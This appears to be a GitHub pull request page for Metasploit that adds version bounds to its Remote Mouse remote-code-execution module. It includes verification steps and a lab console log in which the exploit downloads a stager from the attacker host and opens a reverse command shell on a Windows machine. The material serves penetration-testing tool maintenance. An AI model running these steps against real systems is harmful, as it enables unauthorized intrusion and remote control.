metasploit-framework
metasploit-framework copied to clipboard
Published
20 hours ago •
rapid7
rapid7
Remote mouse version updates
As per discussion here: https://github.com/rapid7/metasploit-framework/pull/17067#issuecomment-1279339260
Implement an upper bounds on the exploitable versions of remote mouse and update the documentation with a vulnerable download link.
Verification
- [ ] update your remote mouse software
- [ ] Start
msfconsole - [ ]
use exploit/windows/misc/remote_mouse_rce - [ ]
set rhost - [ ] run
checkand make sure it gracefully exits since the new version isn't exploitable
Thanks for the enhancement! LGTM 👍
msf6 exploit(windows/misc/remote_mouse_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.137:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 172.16.199.137:1978 - The target appears to be vulnerable. Received handshake with version: 400
[*] 172.16.199.137:1978 - Connecting
[*] 172.16.199.137:1978 - Sending Windows key
[*] 172.16.199.137:1978 - Opening command prompt
[*] 172.16.199.137:1978 - Sending stager
[*] 172.16.199.137:1978 - Using URL: http://172.16.199.1:8080/
[+] 172.16.199.137:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 172.16.199.137:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.199.137
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 172.16.199.137
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.137:50242) at 2022-10-27 16:27:58 -0400
[*] 172.16.199.137:1978 - Server stopped.
[!] 172.16.199.137:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\rBo8oe3r.exe' on the target
Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
-----
C:\Users\msfuser>whoami
whoami
desktop-8athh6o\msfuser
C:\Users\msfuser>exit
exit
Release Notes
This PR updates version checking for the recent Remote mouse RCE module and updates the docs with a vulnerable version download link